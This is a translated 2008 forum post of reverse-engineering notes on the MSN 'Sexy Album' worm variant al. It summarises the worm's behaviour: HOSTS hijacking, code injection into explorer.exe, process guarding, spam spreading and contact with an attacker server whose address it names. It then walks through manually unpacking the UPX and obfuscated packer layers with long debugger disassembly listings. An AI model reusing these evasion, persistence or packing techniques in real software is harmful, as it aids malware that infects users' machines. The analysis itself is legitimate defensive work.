Worm "MSN Sexy Album" variant al: disassembly reverse-analysis notes (with manual unpack...)
Author: depressedboy   Views: 290   Posted: 2008/6/14 22:08
Title: Disassembly and reverse-analysis notes on the worm "MSN Sexy Album" variant al (with a manual unpacking section)
Type: virus disassembly / reverse analysis
Author: Coderui
Date: 2008-06-13
Author's blog: http://hi.baidu.com/coderui
Download: http://forum.jiangmin.com/UploadFile/2008-6/2008613213532556.txt
////////////////////////////////////////////////////////////////////////////////////////////////////
****************************************************************************************************
----------------------------------------------------------------------------------------------------
Summary of the virus's behaviour:

Virus name: Worm/MSN.SendPhoto.al
Chinese name: "Sexy Album" (性感相册) variant al
Length: 23040 bytes
Type: worm
Risk level: ★★
Affected platforms: Win 9X/ME/NT/2000/XP/2003
Description:
Worm/MSN.SendPhoto.al, "Sexy Album" variant al, is one of the newest members of this worm family. It is written in a high-level language and protected with several layers of packing. After it runs, "Sexy Album" variant al copies itself into the "%SystemRoot%\system32\" directory of the infected system under the name "waccs.exe" (file attributes set to system, hidden and read-only). In the background it forcibly rewrites the HOSTS file on the infected computer, using domain-mapping hijacking to block the user from reaching security-related websites. While running it uses process-hiding techniques so that its own process is not displayed, which makes it hard for the user to notice the virus. At runtime it injects malicious executable code into the memory of the desktop process "explorer.exe" and invokes it [the injected code does two things: 1. it opens "%SystemRoot%\system32\waccs.exe" in shared mode so that the user cannot delete the main virus executable; 2. it creates the mutex "t3x0" and, using a process-guarding technique, has the system "explorer.exe" process protect the main virus process from being terminated (it loops checking whether the main virus process has been closed and relaunches it if so).]. In the background, "Sexy Album" variant al mass-sends malicious advertising messages through e-mail and chat tools such as MSN, and may also spread itself through e-mail and MSN. While running it loops continuously in the background, communicating covertly with a remote server designated by the attacker (communication address: "http://www.secure.freebsd.la"), receiving data packets from the attacker's server and performing the corresponding malicious operations according to the "commands" the attacker has defined in the packet. "Sexy Album" variant al adds a new key under the registry startup entries so that the worm runs automatically at boot.
----------------------------------------------------------------------------------------------------

1. Manual unpacking (three layers: UPX + unknown packer + compression packer):

Layer 1: UPX

0041D100 > 60 PUSHAD ; Entry point of the first-layer UPX packer. [F8] step down one instruction.
0041D101 BE 00804100 MOV ESI,misfotos.00418000 ; By the "ESP balance law", set a hardware breakpoint with the command "HR ESP", then [F9] run.
0041D106 8DBE 0090FEFF LEA EDI,DWORD PTR DS:[ESI+FFFE9000]
0041D10C 57 PUSH EDI
0041D10D 83CD FF OR EBP,FFFFFFFF
0041D110 EB 10 JMP SHORT misfotos.0041D122
.
.
.
0041D24B 8D4424 80 LEA EAX,DWORD PTR SS:[ESP-80] ; After running it stops here. Delete the hardware breakpoint with the command "HD".
0041D24F 6A 00 PUSH 0
0041D251 39C4 CMP ESP,EAX
0041D253 ^ 75 FA JNZ SHORT misfotos.0041D24F
0041D255 83EC 80 SUB ESP,-80
0041D258 - E9 EB44FEFF JMP misfotos.00401748 ; This is the key jump: [F4] run to here, then [F8] once more, and you arrive at the OEP of the next packer layer.
----------------------------------------------------------------------------------------------------

[ This post was last edited by depressedboy on 2008-6-14 22:15 ]

----------------------------------------------------------------------------------------------------
Layer 2: unknown packer

00401748 68 A0000000 PUSH 0A0 ; Entry point of the second-layer unknown packer. Keep stepping down with [F8].
0040174D FF15 AA914100 CALL DWORD PTR DS:[4191AA] ; GDI32.GetTextCharset
00401753 2315 10FE4000 AND EDX,DWORD PTR DS:[40FE10]
00401759 B8 D5D4C5E4 MOV EAX,E4C5D4D5
0040175E BA 8AF84694 MOV EDX,9446F88A
00401763 68 00000000 PUSH 0
00401768 FF15 F2914100 CALL DWORD PTR DS:[4191F2] ; GDI32.GetObjectType
0040176E 330D F0FF4000 XOR ECX,DWORD PTR DS:[40FFF0]
00401774 2915 B0F84000 SUB DWORD PTR DS:[40F8B0],EDX
0040177A B9 FE6FDB94 MOV ECX,94DB6FFE
0040177F 60 PUSHAD
00401780 68 78000000 PUSH 78
00401785 FF15 AA914100 CALL DWORD PTR DS:[4191AA] ; GDI32.GetTextCharset
0040178B B8 99B0188D MOV EAX,8D18B099
00401790 23CA AND ECX,EDX
00401792 C1D2 13 RCL EDX,13
00401795 68 5A000000 PUSH 5A
0040179A FF15 CE914100 CALL DWORD PTR DS:[4191CE] ; GDI32.GetTextColor
004017A0 B8 F52BFF3B MOV EAX,3BFF2BF5
004017A5 0BC1 OR EAX,ECX
004017A7 E9 0C000000 JMP misfotos.004017B8
004017AC 81DA 41B3616E SBB EDX,6E61B341
004017B2 81E1 02074014 AND ECX,14400702
004017B8 68 F0000000 PUSH 0F0
004017BD FF15 AA914100 CALL DWORD PTR DS:[4191AA] ; GDI32.GetTextCharset
004017C3 C1C2 14 ROL EDX,14
004017C6 2BC1 SUB EAX,ECX
004017C8 1315 80FC4000 ADC EDX,DWORD PTR DS:[40FC80]
004017CE 6A 40 PUSH 40
004017D0 68 78000000 PUSH 78
004017D5 FF15 DA914100 CALL DWORD PTR DS:[4191DA] ; GDI32.GetStockObject
004017DB 13C8 ADC ECX,EAX
004017DD B8 8EC095D3 MOV EAX,D395C08E
004017E2 E9 0A000000 JMP misfotos.004017F1
004017E7 2BC1 SUB EAX,ECX
004017E9 C1D9 13 RCR ECX,13
004017EC BA DA3D088C MOV EDX,8C083DDA
004017F1 68 5A000000 PUSH 5A
004017F6 FF15 AA914100 CALL DWORD PTR DS:[4191AA] ; GDI32.GetTextCharset
004017FC C1D0 17 RCL EAX,17
004017FF 1BD1 SBB EDX,ECX
00401801 E9 0B000000 JMP misfotos.00401811
00401806 B9 D9B0C767 MOV ECX,67C7B0D9
0040180B 0115 D0FF4000 ADD DWORD PTR DS:[40FFD0],EDX
00401811 68 00100000 PUSH 1000
00401816 68 82000000 PUSH 82
0040181B FF15 F2914100 CALL DWORD PTR DS:[4191F2] ; GDI32.GetObjectType
00401821 23C1 AND EAX,ECX
00401823 81CA 3592BBAE OR EDX,AEBB9235
00401829 1905 10F94000 SBB DWORD PTR DS:[40F910],EAX
0040182F 68 46000000 PUSH 46
00401834 FF15 CE914100 CALL DWORD PTR DS:[4191CE] ; GDI32.GetTextColor
0040183A C1F1 1C SAL ECX,1C
0040183D B8 56BE5D76 MOV EAX,765DBE56
00401842 E9 0C000000 JMP misfotos.00401853
00401847 81D1 C57C94A5 ADC ECX,A5947CC5
0040184D 40 INC EAX
0040184E BA F96C60E2 MOV EDX,E2606CF9
00401853 68 6E000000 PUSH 6E
00401858 FF15 DA914100 CALL DWORD PTR DS:[4191DA] ; GDI32.GetStockObject
0040185E 03C8 ADD ECX,EAX
00401860 81C2 41CE4169 ADD EDX,6941CE41
00401866 3BC8 CMP ECX,EAX
00401868 79 0F JNS SHORT misfotos.00401879
0040186A 330D A0FF4000 XOR ECX,DWORD PTR DS:[40FFA0]
00401870 C1D8 02 RCR EAX,2
00401873 210D B0FA4000 AND DWORD PTR DS:[40FAB0],ECX
00401879 C1D8 07 RCR EAX,7
0040187C 81CA B22C5ABB OR EDX,BB5A2CB2
00401882 1BD1 SBB EDX,ECX
00401884 68 14000000 PUSH 14
00401889 FF15 CE914100 CALL DWORD PTR DS:[4191CE] ; GDI32.GetTextColor
0040188F 310D F0F84000 XOR DWORD PTR DS:[40F8F0],ECX
00401895 81C2 610C3949 ADD EDX,49390C61
0040189B 1B05 A0FE4000 SBB EAX,DWORD PTR DS:[40FEA0]
004018A1 3BC8 CMP ECX,EAX
004018A3 76 0C JBE SHORT misfotos.004018B1
004018A5 81E1 29B246CB AND ECX,CB46B229
004018AB 81DA C19BC3A4 SBB EDX,A4C39BC1
004018B1 C1C0 06 ROL EAX,6
004018B4 0315 A0F84000 ADD EDX,DWORD PTR DS:[40F8A0]
004018BA 2105 50F94000 AND DWORD PTR DS:[40F950],EAX
004018C0 68 E8240000 PUSH 24E8
004018C5 68 14000000 PUSH 14
004018CA FF15 DA914100 CALL DWORD PTR DS:[4191DA] ; GDI32.GetStockObject
004018D0 3115 20FD4000 XOR DWORD PTR DS:[40FD20],EDX
004018D6 81D1 FE912D27 ADC ECX,272D91FE
004018DC 68 78000000 PUSH 78
004018E1 FF15 CE914100 CALL DWORD PTR DS:[4191CE] ; GDI32.GetTextColor
004018E7 2B05 20F84000 SUB EAX,DWORD PTR DS:[40F820]
004018ED 0BC2 OR EAX,EDX
004018EF BA E1B9BFBE MOV EDX,BEBFB9E1
004018F4 81FA F5118A80 CMP EDX,808A11F5
004018FA 75 11 JNZ SHORT misfotos.0040190D
004018FC B8 3EC66BBE MOV EAX,BE6BC63E
00401901 81C9 41E9FB10 OR ECX,10FBE941
00401907 2905 B0F84000 SUB DWORD PTR DS:[40F8B0],EAX
0040190D B9 09053E33 MOV ECX,333E0509
00401912 BA A1807B32 MOV EDX,327B80A1
00401917 1B05 70FD4000 SBB EAX,DWORD PTR DS:[40FD70]
0040191D 68 28000000 PUSH 28
00401922 FF15 F2914100 CALL DWORD PTR DS:[4191F2] ; GDI32.GetObjectType
00401928 C1C9 1E ROR ECX,1E
0040192B 0105 D0FA4000 ADD DWORD PTR DS:[40FAD0],EAX
00401931 E9 0D000000 JMP misfotos.00401943
00401936 B9 B16624FB MOV ECX,FB2466B1
0040193B 1915 00FD4000 SBB DWORD PTR DS:[40FD00],EDX
00401941 13D1 ADC EDX,ECX
00401943 6A 00 PUSH 0
00401945 68 F0000000 PUSH 0F0
0040194A FF15 DA914100 CALL DWORD PTR DS:[4191DA] ; GDI32.GetStockObject
00401950 1105 90FF4000 ADC DWORD PTR DS:[40FF90],EAX
00401956 BA FAFEEA35 MOV EDX,35EAFEFA
0040195B 3BC1 CMP EAX,ECX
0040195D 79 09 JNS SHORT misfotos.00401968
0040195F 42 INC EDX
00401960 2B05 20FF4000 SUB EAX,DWORD PTR DS:[40FF20]
00401966 2BCA SUB ECX,EDX
00401968 3305 50FC4000 XOR EAX,DWORD PTR DS:[40FC50]
0040196E B9 FEA2EB76 MOV ECX,76EBA2FE
00401973 68 64000000 PUSH 64
00401978 FF15 F2914100 CALL DWORD PTR DS:[4191F2] ; GDI32.GetObjectType
0040197E 13C8 ADC ECX,EAX
00401980 33CA XOR ECX,EDX
00401982 81C1 9D3A4307 ADD ECX,7433A9D
00401988 E9 0C000000 JMP misfotos.00401999
0040198D 81C2 EA541683 ADD EDX,831654EA
00401993 81D1 72147E2A ADC ECX,2A7E1472
00401999 68 3C000000 PUSH 3C
0040199E FF15 AA914100 CALL DWORD PTR DS:[4191AA] ; GDI32.GetTextCharset
004019A4 3315 E0FA4000 XOR EDX,DWORD PTR DS:[40FAE0]
004019AA 81C1 2DF6770C ADD ECX,0C77F62D
004019B0 81E9 A1DB420D SUB ECX,0D42DBA1
004019B6 3B05 64FD4000 CMP EAX,DWORD PTR DS:[40FD64]
004019BC 7E 04 JLE SHORT misfotos.004019C2
004019BE C1F2 09 SAL EDX,9
004019C1 41 INC ECX
004019C2 1105 C0FD4000 ADC DWORD PTR DS:[40FDC0],EAX
004019C8 2315 B0FD4000 AND EDX,DWORD PTR DS:[40FDB0]
004019CE FF15 4E924100 CALL DWORD PTR DS:[41924E] ; kernel32.VirtualAlloc
004019D4 8BF0 MOV ESI,EAX
004019D6 68 46000000 PUSH 46
004019DB FF15 DA914100 CALL DWORD PTR DS:[4191DA] ; GDI32.GetStockObject
004019E1 81D1 E665EAFA ADC ECX,FAEA65E6
004019E7 3105 40FA4000 XOR DWORD PTR DS:[40FA40],EAX
004019ED 3BCA CMP ECX,EDX
004019EF 79 08 JNS SHORT misfotos.004019F9
004019F1 0BD1 OR EDX,ECX
004019F3 B9 D5A0E402 MOV ECX,2E4A0D5
004019F8 40 INC EAX
004019F9 0915 F0FE4000 OR DWORD PTR DS:[40FEF0],EDX
004019FF 0BD0 OR EDX,EAX
00401A01 68 32000000 PUSH 32
00401A06 FF15 AA914100 CALL DWORD PTR DS:[4191AA] ; GDI32.GetTextCharset
00401A0C 0BC8 OR ECX,EAX
00401A0E 0BC8 OR ECX,EAX
00401A10 3B15 40FE4000 CMP EDX,DWORD PTR DS:[40FE40]
00401A16 71 0E JNO SHORT misfotos.00401A26
00401A18 1905 30F94000 SBB DWORD PTR DS:[40F930],EAX
00401A1E BA 9DDD9596 MOV EDX,9695DD9D
00401A23 C1E9 1E SHR ECX,1E
00401A26 B8 3EE8BC94 MOV EAX,94BCE83E
00401A2B 81C1 861A3829 ADD ECX,29381A86
00401A31 81E9 F15DE68A SUB ECX,8AE65DF1
00401A37 56 PUSH ESI
00401A38 68 00000000 PUSH 0
00401A3D FF15 F2914100 CALL DWORD PTR DS:[4191F2] ; GDI32.GetObjectType
00401A43 0115 90FA4000 ADD DWORD PTR DS:[40FA90],EDX
00401A49 81E1 B524DB34 AND ECX,34DB24B5
00401A4F BA 2A9C114C MOV EDX,4C119C2A
00401A54 3B05 EAFE4000 CMP EAX,DWORD PTR DS:[40FEEA]
00401A5A 79 0F JNS SHORT misfotos.00401A6B
00401A5C C1D1 1C RCL ECX,1C
00401A5F 81C9 B1DCFAD0 OR ECX,D0FADCB1
00401A65 81D2 D2D09685 ADC EDX,8596D0D2
00401A6B C1E8 16 SHR EAX,16
00401A6E 1BCA SBB ECX,EDX
00401A70 68 00000000 PUSH 0
00401A75 68 FA000000 PUSH 0FA
00401A7A FF15 A2914100 CALL DWORD PTR DS:[4191A2] ; GDI32.GetMetaRgn
00401A80 81CA 16FA2657 OR EDX,5726FA16
00401A86 0905 E0FF4000 OR DWORD PTR DS:[40FFE0],EAX
00401A8C 3B15 EAFE4000 CMP EDX,DWORD PTR DS:[40FEEA]
00401A92 76 0B JBE SHORT misfotos.00401A9F
00401A94 B9 395EFC83 MOV ECX,83FC5E39
00401A99 0B15 D0F94000 OR EDX,DWORD PTR DS:[40F9D0]
00401A9F 81C1 65825161 ADD ECX,61518265
00401AA5 C1E0 07 SHL EAX,7
00401AA8 C1EA 0B SHR EDX,0B
00401AAB 68 64000000 PUSH 64
00401AB0 FF15 F2914100 CALL DWORD PTR DS:[4191F2] ; GDI32.GetObjectType
00401AB6 B8 F918B92E MOV EAX,2EB918F9
00401ABB 1BC2 SBB EAX,EDX
00401ABD E9 0B000000 JMP misfotos.00401ACD
00401AC2 B9 869B3EB7 MOV ECX,B73E9B86
00401AC7 1B05 F0FE4000 SBB EAX,DWORD PTR DS:[40FEF0]
00401ACD BB 60124000 MOV EBX,misfotos.00401260
00401AD2 68 96000000 PUSH 96
00401AD7 FF15 DA914100 CALL DWORD PTR DS:[4191DA] ; GDI32.GetStockObject
00401ADD C1EA 05 SHR EDX,5
00401AE0 290D C0FD4000 SUB DWORD PTR DS:[40FDC0],ECX
00401AE6 3BD1 CMP EDX,ECX
00401AE8 7E 08 JLE SHORT misfotos.00401AF2
00401AEA BA C66B979C MOV EDX,9C976BC6
00401AEF C1C1 11 ROL ECX,11
00401AF2 03CA ADD ECX,EDX
00401AF4 3315 10FB4000 XOR EDX,DWORD PTR DS:[40FB10]
00401AFA 2BD1 SUB EDX,ECX
00401AFC 68 6E000000 PUSH 6E
00401B01 FF15 F2914100 CALL DWORD PTR DS:[4191F2] ; GDI32.GetObjectType
00401B07 0305 20FE4000 ADD EAX,DWORD PTR DS:[40FE20]
00401B0D B9 A5000ABB MOV ECX,BB0A00A5
00401B12 03C2 ADD EAX,EDX
00401B14 68 14000000 PUSH 14
00401B19 FF15 DA914100 CALL DWORD PTR DS:[4191DA] ; GDI32.GetStockObject
00401B1F 3315 90FC4000 XOR EDX,DWORD PTR DS:[40FC90]
00401B25 23D1 AND EDX,ECX
00401B27 68 A0000000 PUSH 0A0
00401B2C FF15 CE914100 CALL DWORD PTR DS:[4191CE] ; GDI32.GetTextColor
00401B32 B9 AAD1A3A8 MOV ECX,A8A3D1AA
00401B37 40 INC EAX
00401B38 81FA 3A9082CD CMP EDX,CD82903A
00401B3E 7A 07 JPE SHORT misfotos.00401B47
00401B40 0BD1 OR EDX,ECX
00401B42 B8 524E36FD MOV EAX,FD364E52
00401B47 B9 5A47DD0D MOV ECX,0DDD475A
00401B4C C1D2 10 RCL EDX,10
00401B4F FF33 PUSH DWORD PTR DS:[EBX]
00401B51 68 3C000000 PUSH 3C
00401B56 FF15 F2914100 CALL DWORD PTR DS:[4191F2] ; GDI32.GetObjectType
00401B5C 2B0D D0FF4000 SUB ECX,DWORD PTR DS:[40FFD0]
00401B62 81CA 02BDDE9F OR EDX,9FDEBD02
00401B68 81F9 2D7FA92C CMP ECX,2CA97F2D
00401B6E 7D 0A JGE SHORT misfotos.00401B7A
00401B70 C1C2 1D ROL EDX,1D
00401B73 23D0 AND EDX,EAX
00401B75 B8 B6B34935 MOV EAX,3549B3B6
00401B7A 03D1 ADD EDX,ECX
00401B7C B9 C66C3771 MOV ECX,71376CC6
00401B81 68 B4000000 PUSH 0B4
00401B86 FF15 CE914100 CALL DWORD PTR DS:[4191CE] ; GDI32.GetTextColor
00401B8C 81C9 4AE9DD0F OR ECX,0FDDE94A
00401B92 23C2 AND EAX,EDX
00401B94 C1E2 18 SHL EDX,18
00401B97 8F06 POP DWORD PTR DS:[ESI]
00401B99 68 F0000000 PUSH 0F0
00401B9E FF15 DA914100 CALL DWORD PTR DS:[4191DA] ; GDI32.GetStockObject
00401BA4 81D2 A513B20F ADC EDX,0FB213A5
00401BAA 81EA D9325608 SUB EDX,85632D9
00401BB0 3B0D 58FA4000 CMP ECX,DWORD PTR DS:[40FA58]
00401BB6 71 0E JNO SHORT misfotos.00401BC6
00401BB8 1105 00FC4000 ADC DWORD PTR DS:[40FC00],EAX
00401BBE 2B0D E0F84000 SUB ECX,DWORD PTR DS:[40F8E0]
00401BC4 13C2 ADC EAX,EDX
00401BC6 2B15 C0FE4000 SUB EDX,DWORD PTR DS:[40FEC0]
00401BCC B9 46AD58D4 MOV ECX,D458AD46
00401BD1 68 3C000000 PUSH 3C
00401BD6 FF15 AA914100 CALL DWORD PTR DS:[4191AA] ; GDI32.GetTextCharset
00401BDC 81D2 560493C0 ADC EDX,C0930456
00401BE2 2B05 50FC4000 SUB EAX,DWORD PTR DS:[40FC50]
00401BE8 B9 66C9A1A9 MOV ECX,A9A1C966
00401BED 8136 838221BB XOR DWORD PTR DS:[ESI],BB218283
00401BF3 68 F0000000 PUSH 0F0
00401BF8 FF15 F2914100 CALL DWORD PTR DS:[4191F2] ; GDI32.GetObjectType
00401BFE C1C0 0A ROL EAX,0A
00401C01 1915 00FC4000 SBB DWORD PTR DS:[40FC00],EDX
00401C07 1BC8 SBB ECX,EAX
00401C09 81FA F18ED7B1 CMP EDX,B1D78EF1
00401C0F 71 0D JNO SHORT misfotos.00401C1E
00401C11 13D0 ADC EDX,EAX
00401C13 B8 9AB6D2C1 MOV EAX,C1D2B69A
00401C18 81D9 22BB5FB5 SBB ECX,B55FBB22
00401C1E C1C8 11 ROR EAX,11
00401C21 03D1 ADD EDX,ECX
00401C23 68 8C000000 PUSH 8C
00401C28 FF15 AA914100 CALL DWORD PTR DS:[4191AA] ; GDI32.GetTextCharset
00401C2E 0B05 00FE4000 OR EAX,DWORD PTR DS:[40FE00]
00401C34 81D9 C9CE2159 SBB ECX,5921CEC9
00401C3A 68 5A000000 PUSH 5A
00401C3F FF15 F2914100 CALL DWORD PTR DS:[4191F2] ; GDI32.GetObjectType
00401C45 2BC2 SUB EAX,EDX
00401C47 1B0D 60FB4000 SBB ECX,DWORD PTR DS:[40FB60]
00401C4D E9 0F000000 JMP misfotos.00401C61
00401C52 1B05 30FB4000 SBB EAX,DWORD PTR DS:[40FB30]
00401C58 C1C2 04 ROL EDX,4
00401C5B 81C1 1206B1A2 ADD ECX,A2B10612
00401C61 8106 410E9B09 ADD DWORD PTR DS:[ESI],99B0E41
00401C67 68 14000000 PUSH 14
00401C6C 68 E6000000 PUSH 0E6
00401C71 FF15 A2914100 CALL DWORD PTR DS:[4191A2] ; GDI32.GetMetaRgn
00401C77 81DA D197286B SBB EDX,6B2897D1
00401C7D 81C1 E9767E1F ADD ECX,1F7E76E9
00401C83 E9 0B000000 JMP misfotos.00401C93
00401C88 B8 3A429A7D MOV EAX,7D9A423A
00401C8D 1315 20FD4000 ADC EDX,DWORD PTR DS:[40FD20]
00401C93 68 C8000000 PUSH 0C8
00401C98 FF15 DA914100 CALL DWORD PTR DS:[4191DA] ; GDI32.GetStockObject
00401C9E C1D8 05 RCR EAX,5
00401CA1 BA 5A7944FA MOV EDX,FA44795A
00401CA6 3B0D 26FF4000 CMP ECX,DWORD PTR DS:[40FF26]
00401CAC 72 09 JB SHORT misfotos.00401CB7
00401CAE C1DA 02 RCR EDX,2
00401CB1 210D 70FA4000 AND DWORD PTR DS:[40FA70],ECX
00401CB7 1BD0 SBB EDX,EAX
00401CB9 B9 5E1AF8E0 MOV ECX,E0F81A5E
00401CBE 68 A0000000 PUSH 0A0
00401CC3 FF15 CE914100 CALL DWORD PTR DS:[4191CE] ; GDI32.GetTextColor
00401CC9 81DA B9742043 SBB EDX,432074B9
00401CCF C1E1 06 SHL ECX,6
00401CD2 E9 0B000000 JMP misfotos.00401CE2
00401CD7 81D1 0122DAA3 ADC ECX,A3DA2201
00401CDD BA 8E48FDE4 MOV EDX,E4FD488E
00401CE2 81C3 1151EC60 ADD EBX,60EC5111
00401CE8 68 D2000000 PUSH 0D2
00401CED FF15 F2914100 CALL DWORD PTR DS:[4191F2] ; GDI32.GetObjectType
00401CF3 C1E9 13 SHR ECX,13
00401CF6 81EA DA05CDAB SUB EDX,ABCD05DA
00401CFC E9 0D000000 JMP misfotos.00401D0E
00401D01 B9 75BDE543 MOV ECX,43E5BD75
00401D06 BA 4D8AE267 MOV EDX,67E28A4D
00401D0B C1C8 03 ROR EAX,3
00401D0E 68 FA000000 PUSH 0FA
00401D13 68 C8000000 PUSH 0C8
00401D18 FF15 A2914100 CALL DWORD PTR DS:[4191A2] ; GDI32.GetMetaRgn

00401D1E BA 167E846E MOV EDX,6E847E16
00401D23 C1C8 03 ROR EAX,3
00401D26 3B15 74FC4000 CMP EDX,DWORD PTR DS:[40FC74]
00401D2C 76 0C JBE SHORT misfotos.00401D3A
00401D2E 1905 C0FE4000 SBB DWORD PTR DS:[40FEC0],EAX
00401D34 1B15 E0F84000 SBB EDX,DWORD PTR DS:[40F8E0]
00401D3A B8 E9C146FE MOV EAX,FE46C1E9
00401D3F 1B15 B0F84000 SBB EDX,DWORD PTR DS:[40F8B0]
00401D45 1B05 50FB4000 SBB EAX,DWORD PTR DS:[40FB50]
00401D4B 81C3 F3AE139F ADD EBX,9F13AEF3
00401D51 68 28000000 PUSH 28
00401D56 FF15 AA914100 CALL DWORD PTR DS:[4191AA] ; GDI32.GetTextCharset
00401D5C C1D9 0B RCR ECX,0B
00401D5F 81C1 F9C4B1D6 ADD ECX,D6B1C4F9
00401D65 1915 80FD4000 SBB DWORD PTR DS:[40FD80],EDX
00401D6B 68 A0000000 PUSH 0A0
00401D70 FF15 F2914100 CALL DWORD PTR DS:[4191F2] ; GDI32.GetObjectType
00401D76 23D1 AND EDX,ECX
00401D78 0305 20FC4000 ADD EAX,DWORD PTR DS:[40FC20]
00401D7E C1DA 13 RCR EDX,13
00401D81 3B0D 6CFF4000 CMP ECX,DWORD PTR DS:[40FF6C]
00401D87 71 0E JNO SHORT misfotos.00401D97
00401D89 C1D2 1A RCL EDX,1A
00401D8C 81E2 8DCC5475 AND EDX,7554CC8D
00401D92 B8 BAC7C622 MOV EAX,22C6C7BA
00401D97 C1FA 12 SAR EDX,12
00401D9A C1C1 08 ROL ECX,8
00401D9D 81C6 6AED2E2F ADD ESI,2F2EED6A
00401DA3 68 E6000000 PUSH 0E6
00401DA8 FF15 DA914100 CALL DWORD PTR DS:[4191DA] ; GDI32.GetStockObject
00401DAE 1B05 50F94000 SBB EAX,DWORD PTR DS:[40F950]
00401DB4 B9 6AA78799 MOV ECX,9987A76A
00401DB9 81FA F23E3F93 CMP EDX,933F3EF2
00401DBF 72 07 JB SHORT misfotos.00401DC8
00401DC1 23D0 AND EDX,EAX
00401DC3 B9 16DFEE35 MOV ECX,35EEDF16
00401DC8 81C1 12580249 ADD ECX,49025812
00401DCE 13C2 ADC EAX,EDX
00401DD0 68 C8000000 PUSH 0C8
00401DD5 68 0A000000 PUSH 0A
00401DDA FF15 A2914100 CALL DWORD PTR DS:[4191A2] ; GDI32.GetMetaRgn
00401DE0 81D2 46B0111A ADC EDX,1A11B046
00401DE6 B9 3DCFF281 MOV ECX,81F2CF3D
00401DEB B8 950F5EFE MOV EAX,FE5E0F95
00401DF0 81FA CA307D84 CMP EDX,847D30CA
00401DF6 7A 08 JPE SHORT misfotos.00401E00
00401DF8 1105 00FC4000 ADC DWORD PTR DS:[40FC00],EAX
00401DFE 1BC2 SBB EAX,EDX
00401E00 1BD1 SBB EDX,ECX
00401E02 C1F9 18 SAR ECX,18
00401E05 68 3C000000 PUSH 3C
00401E0A FF15 DA914100 CALL DWORD PTR DS:[4191DA] ; GDI32.GetStockObject
00401E10 0BC8 OR ECX,EAX
00401E12 1BD0 SBB EDX,EAX
00401E14 0305 80FA4000 ADD EAX,DWORD PTR DS:[40FA80]
00401E1A 81C6 9A12D1D0 ADD ESI,D0D1129A
00401E20 81FB 48174000 CMP EBX,misfotos.00401748
00401E26 ^ 0F85 A6FCFFFF JNZ misfotos.00401AD2 ; Do not take this backward jump; run straight on to the next line of code, because this is a loop.
00401E2C 68 50000000 PUSH 50 ; [F4] run to here, then keep stepping down with [F8].
00401E31 68 8C000000 PUSH 8C
00401E36 FF15 A2914100 CALL DWORD PTR DS:[4191A2] ; GDI32.GetMetaRgn
00401E3C 13D1 ADC EDX,ECX
00401E3E C1C8 1B ROR EAX,1B
00401E41 BA B13EEE10 MOV EDX,10EE3EB1
00401E46 81F9 9E40C622 CMP ECX,22C6409E
00401E4C 7E 0B JLE SHORT misfotos.00401E59
00401E4E 3305 50FB4000 XOR EAX,DWORD PTR DS:[40FB50]
00401E54 B9 79450E10 MOV ECX,100E4579
00401E59 3305 50FB4000 XOR EAX,DWORD PTR DS:[40FB50]
00401E5F B9 C18E4B4F MOV ECX,4F4B8EC1
00401E64 23D0 AND EDX,EAX
00401E66 68 14000000 PUSH 14
00401E6B FF15 DA914100 CALL DWORD PTR DS:[4191DA] ; GDI32.GetStockObject
00401E71 0905 60FF4000 OR DWORD PTR DS:[40FF60],EAX
00401E77 03C1 ADD EAX,ECX
00401E79 E9 0C000000 JMP misfotos.00401E8A
00401E7E C1E1 08 SHL ECX,8
00401E81 0B05 90FB4000 OR EAX,DWORD PTR DS:[40FB90]
00401E87 C1CA 0C ROR EDX,0C
00401E8A 68 BE000000 PUSH 0BE
00401E8F FF15 F2914100 CALL DWORD PTR DS:[4191F2] ; GDI32.GetObjectType
00401E95 C1E1 1A SHL ECX,1A
00401E98 BA 66CD8033 MOV EDX,3380CD66
00401E9D 5B POP EBX
00401E9E 68 F0000000 PUSH 0F0
00401EA3 FF15 CE914100 CALL DWORD PTR DS:[4191CE] ; GDI32.GetTextColor
00401EA9 48 DEC EAX
00401EAA BA A97A171B MOV EDX,1B177AA9
00401EAF 81EA FD9A1BC0 SUB EDX,C01B9AFD
00401EB5 81F9 02AAC65E CMP ECX,5EC6AA02
00401EBB 72 08 JB SHORT misfotos.00401EC5
00401EBD C1F0 11 SAL EAX,11
00401EC0 B9 853F21A6 MOV ECX,A6213F85
00401EC5 C1F0 02 SAL EAX,2
00401EC8 BA B5C941E2 MOV EDX,E241C9B5
00401ECD 03D1 ADD EDX,ECX
00401ECF 68 AA000000 PUSH 0AA
00401ED4 68 BE000000 PUSH 0BE
00401ED9 FF15 A2914100 CALL DWORD PTR DS:[4191A2] ; GDI32.GetMetaRgn
00401EDF 81C1 428C77DA ADD ECX,DA778C42
00401EE5 2915 20FD4000 SUB DWORD PTR DS:[40FD20],EDX
00401EEB FFD3 CALL EBX ; When you reach here, do NOT press [F8] to step over, or execution will run away. Press [F7] to step into it; inside is the OEP of the next packer layer.
00401EED 68 3C000000 PUSH 3C
00401EF2 FF15 F2914100 CALL DWORD PTR DS:[4191F2] ; GDI32.GetObjectType
00401EF8 03C1 ADD EAX,ECX
00401EFA C1C2 13 ROL EDX,13
00401EFD C1E8 18 SHR EAX,18
00401F00 E9 10000000 JMP misfotos.00401F15
00401F05 1315 A0FB4000 ADC EDX,DWORD PTR DS:[40FBA0]
00401F0B B9 824E7AB1 MOV ECX,B17A4E82
00401F10 B8 8AA4C975 MOV EAX,75C9A48A
00401F15 68 82000000 PUSH 82
00401F1A FF15 CE914100 CALL DWORD PTR DS:[4191CE] ; GDI32.GetTextColor
00401F20 190D 20FC4000 SBB DWORD PTR DS:[40FC20],ECX
00401F26 C1EA 0B SHR EDX,0B
00401F29 130D C0FD4000 ADC ECX,DWORD PTR DS:[40FDC0]
00401F2F E9 10000000 JMP misfotos.00401F44
00401F34 B8 6587CF97 MOV EAX,97CF8765
00401F39 81C1 0E541C99 ADD ECX,991C540E
00401F3F B8 957536C9 MOV EAX,C9367595
00401F44 61 POPAD
00401F45 68 64000000 PUSH 64
00401F4A FF15 F2914100 CALL DWORD PTR DS:[4191F2] ; GDI32.GetObjectType
00401F50 81D2 E1473A10 ADC EDX,103A47E1
00401F56 C1C1 02 ROL ECX,2
00401F59 C1D2 01 RCL EDX,1
00401F5C 3BC8 CMP ECX,EAX
00401F5E 76 07 JBE SHORT misfotos.00401F67
00401F60 BA 4E40CC04 MOV EDX,4CC404E
00401F65 23C8 AND ECX,EAX
00401F67 1915 40FE4000 SBB DWORD PTR DS:[40FE40],EDX
00401F6D 81D1 B9200B37 ADC ECX,370B20B9
00401F73 C1DA 10 RCR EDX,10
00401F76 68 64000000 PUSH 64
00401F7B 68 DC000000 PUSH 0DC
00401F80 FF15 A2914100 CALL DWORD PTR DS:[4191A2] ; GDI32.GetMetaRgn
